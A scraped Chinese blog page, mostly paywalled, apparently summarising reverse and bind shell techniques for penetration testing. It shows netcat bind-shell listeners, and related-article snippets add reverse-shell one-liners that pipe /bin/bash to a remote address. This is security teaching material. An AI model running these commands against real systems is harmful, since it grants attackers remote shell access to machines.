反弹shell总结

已于 2023-12-06 21:43:30 修改
阅读量1.8k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: 网络安全 web安全 安全 运维 linux 服务器
于 2023-08-31 17:51:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_54626591/article/details/132606290
网络安全 专栏收录该内容
219 篇文章 ¥299.90 ¥399.90
订阅专栏
本文详细总结了各种Linux反弹shell的技术,包括nc、python、bash、PHP、Perl、Java等语言实现的反弹shell,以及socat、ruby、lua、awk、exec等工具和方法。此外,还介绍了在目标主机没有nc时如何获取反向shell,以及通过msfvenom生成反弹shell。文章适用于网络安全和Web安全领域的专业人士,帮助他们更好地理解和利用反弹shell进行渗透测试。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

反弹shell总结



讲在前面说的话:

没有任何基础的 推荐 【技术分享】linux各种一句话反弹shell总结



反弹shell总结

nc反弹shell

正向shell
nc -lvp 1234 -e /bin/bash # linux  服务端(被攻击的主机)

nc -lvp 1234 -e c:\windows\system32\cmd.exe # windows 服务端(被攻击的主机)


                

                
                
        

    

    
  


        

            

                

                

                了解本专栏
                
                
                  
                订阅专栏 解锁全文
                 
            

        


    



                



	

		

			

				
					
Linux 强大的网络命令:nc命令操作方法

				
			

			

				

					嵌入式技术开发
				

				

					01-22
					
					1139
					
				

			

		

		

			
				
通过Netcat,您可以自定义传输的数据包格式。" | nc 目标主机IP 1234这将向目标主机的1234端口发送自定义格式的数据包。

			
		

	



                

            
              



	

		

			

				
					
nc 监听数据_nc命令使用解析大全

				
			

			

				

					weixin_33701632的博客
				

				

					12-24
					
					5270
					
				

			

		

		

			
				
名称nc - 任意的TCP和UDp连接与监听工具概要nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port][-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol] [-xproxy_address[:port]] [hostname] [port[s]]描述nc(或者netc...

			
		

	



              


  
              

                


	

		

			

				
					
nc命令简单使用

				
			

			

				

					liutao43的博客
				

				

					04-07
					
					2247
					
				

			

		

		

			
				
参考:
https://blog.youkuaiyun.com/qq_42906907/article/details/103458718
linux nc命令
简介:
nc是netcat的简称,有着网络界瑞士军刀的美称,被称为简单可靠的操作系统的网络工具。
功能
监听任意TCP/UDP端口的侦听
端口的扫描
机器之间传输文件
机器之间网络测速
控制参数

由于nc命令默认是做客户端使用的,所以使用-l参数,用于指定nc将处于监听模式。意味着这时的nc被当作server,侦听并接受连接,而非向其它地址发起连接。
探测主

			
		

	





	

		

			

				
					
man nc 中文版

				
			

			

				

					继学先生
				

				

					04-11
					
					1245
					
				

			

		

		

			
				
(1)                             BSD 常规命令指南          名字: 
    nc  -  连接、监听任意的TCP和UDP。 
概要: 
    nc [-46DdhklnrStUuvzC] [-i 间隔] [-p 源端口]  
        [-s 源IP地址] [-T 服务类型] [-w 超时时间] [-X 代理协议] 
        [-x 代理

			
		

	



		

			
		



	

		

			

				
					
Linux反弹Shell总结

				
			

			

				

					qq_45600801的博客
				

				

					01-06
					
					4438
					
				

			

		

		

			
				
反弹姿势
1、NC正向反弹
靶机:
nc -lvvp 靶机端口 -e /bin/sh

攻击机:
nc 靶机ip 靶机端口

2、NC反向反弹
(1)、可使用-e参数:
靶机:
nc x.x.x.x 8888 -e /bin/bash 

攻击机:
nc -lvvp 8888

(2)、NC,无-e参数反弹shell
有些版本的NC可能不支持-e选项,不能使用-e,则:
方法一:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc

			
		

	





	

		

			

				
					
Php shell端口反弹,Linux下通过webshell反弹shell总结

				
			

			

				

					weixin_33253503的博客
				

				

					03-12
					
					531
					
				

			

		

		

			
				
反弹shell原因:Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法 利用。因此必须要反弹一个Shell命令行窗口,在命令行终端下执行溢出进行提权。nc命令参数:参  数:-g设置路由器跃程通信网关,最丢哦可设置8个。-G设置来源路由指向器,其数值为...

			
		

	





	

		

			

				
					
Linux反弹shell总结与实践

				
			

			

				

					不想当脚本小子的脚本小子
				

				

					12-05
					
					315
					
				

			

		

		

			
				
最近在学习的时候碰到了利用kali写反弹shell的操作,趁着有空的时候过来系统学习一下。给1.什么情况下需要写入反弹shell。2.如何写入反弹shell 3.反弹shell成功的原理是什么 4.反弹shell有没有什么变形。5.反弹shell有哪些方法?

 当我去攻击一台机器的时候,通过该机器的端口以及端口提供的服务(SSH、telnet等等)可以直接去连接到这台机器,但是如果连不上这台机器那就不如让它弹一个shell回来(可以理解为从对方的机器上拿一个控制权到自己手里),比如这个机器在内网里,...

			
		

	





	

		

			

				
					
Linux Shell脚本编程--nc命令使用详解

				
			

			

				

					上善若水,水善利万物而不争。
				

				

					08-25
					
					3万+
					
				

			

		

		

			
				
linux nc命令使用详解
    
功能说明:功能强大的网络工具
语 法:nc [-hlnruz][-g网关...>][-G指向器数目>][-i延迟秒数>][-o输出文件>][-p通信端口>][-s来源位址>][-v...][-w超时秒数>][主机名称][通信端口...]
参 数:
 -g网关> 
设置路由器跃程通信网关,最丢哦可设置8个。
 -G指向器数目> 
设置来源路由指

			
		

	





	

		

			

				
					
Linux中的nc测试端口是否开放

				
			

			

				

					weixin_30307267的博客
				

				

					08-09
					
					1246
					
				

			

		

		

			
				
nc测试端口是否开放
在Linux中有一个级强大的网络工具netcat,在默认情况下面都是没有安装的,现在介绍一下安装过程其实安装很简单
一、安装使用
1、只需输入命令yum安装:

[root@SZB-L0032015 ~]# yum install -y nc


[root@SZB-L0032015 ~]# yum install -y nc
Loaded plugins...

			
		

	





	

		

			

				
					
NC工具的使用说明教程

					
热门推荐

				
			

			

				

					xysoul的专栏
				

				

					08-21
					
					9万+
					
				

			

		

		

			
				
nc的使用方法

netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧......
一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 

在中国,它

			
		

	





	

		

			

				
					
图文介绍——NC使用笔记

				
			

			

				

					LainWith的博客
				

				

					01-20
					
					8350
					
				

			

		

		

			
				
NC

简介
Netcat 简称为nc,中文名网猫,被誉为网络工具中的瑞士军刀。具备以下功能:

侦听模式/传输模式
telnet/获取 banner信息(当作telent工具使用,甚至更好用)
传输文本信息(可以作为聊天工具)
传输文件/目录
加密传输文件
远程控制/木马(一般来说,不会被查杀)
加密所有流量
流媒体服务器
远程克隆硬盘(一般用作电子取证)

nc 有很多变种。不同的变种,会在原有 nc 的基础上增加一些新功能。比较流行的变种之一是OpenBSD 社区的变种(也叫“OpenBSD netc

			
		

	





	

		

			

				
					
内网中使用netcat进行正向和反向获取shell

				
			

			

				

					bring_coco的博客
				

				

					12-07
					
					4434
					
				

			

		

		

			
				
本次演示在linux环境下
一般用外网机器对内网机器进行访问时,多用反向shell,内网机器与内网机器之间多用正向shell
正向shell
由于内网及其属于边界服务器,因此我们先进行正向shell演示(正向shell是在目标机器上进行监听):
内网机器上命令:nc -lvp 4444 -e /bin/sh
本地机器上命令:nc 10.0.78.41 4444

显示已经连接
进行验证:

说明正向连接成功
反向shell
反向shell是在本地vps上进行监听,目标机器进行连接
本地机器上命令:nc -l

			
		

	





	

		

			

				
					
内网渗透-端口转发隧道技术

				
			

			

				

					weixin_60329395的博客
				

				

					08-02
					
					2411
					
				

			

		

		

			
				
代理和隧道技术区别、代理只是为了解决网络通信问题,有些内网访问不到,可以用代理实现、隧道不仅是解决网络的通信问题,更大的作用是绕过过滤,突破防火墙/入侵检测系统。(封装协议)

			
		

	





	

		

			

				
					
linux nc命令使用详解

				
			

			

				

					chbxw
				

				

					08-16
					
					6044
					
				

			

		

		

			
				
linux nc命令使用详解

功能说明:功能强大的网络工具 
语  法:nc [-hlnruz][-g<网关…>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v…][-w<超时秒数>][主机名称][通信端口…] 
参  数: 
 -g<网

			
		

	





	

		

			

				
					
nc具体用法

				
			

			

				

					嘻嘻哈哈
				

				

					01-24
					
					7566
					
				

			

		

		

			
				
nc简介



1、nc

nc全称netcat,又叫做瑞士军刀,是一款简单、可靠的网络工具



2、nc的作用


实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口
端口扫描,nc可以作为client发起TCP或UDP连接
机器之间传输文件
机器之间网络测速




3、常用参数



-l:用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作s

			
		

	





	

		

			

				
					
linuxnc的使用

				
			

			

				

					weixin_33962923的博客
				

				

					04-26
					
					294
					
				

			

		

		

			
				
linuxnc的使用
今天在饮水思源上闲逛,看到了一个贴子关于Linuxnc命来实现文件传输,进行学习了解了一下。
发送端:
cattest.txt | nc -l -p 6666
或者nc -l -p 6666 < test.txt
【监听6666端口,等待连接】(设发送端IP为10.20.133.152)
接收端:
nc 10.20.13...

			
		

	





	

		

			

				
					
windows 反弹shell_反弹shell的各种姿势

				
			

			

				

					weixin_39800331的博客
				

				

					11-27
					
					481
					
				

			

		

		

			
				
来自公众号:Bypass在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。本文所有姿势整理自网络,并基于同一个假设的前提下完成测试和验证。(假设:攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。)Linu...

			
		

	





	

		

			

				
					
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》

				
			

			

				

					weixin_59086772的博客
				

				

					10-18
					
					8737
					
				

			

		

		

			
				
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。

今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。







一、网络安全行业市场发展情况

网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.

			
		

	





	

		

			

				
					
公网实现反弹shell

					
最新发布

				
			

			

				

					07-27
				

			

		

		

			
				
- *1* *3* [反弹shell总结](https://blog.youkuaiyun.com/weixin_51692662/article/details/127795576)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
坦笑&&life

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值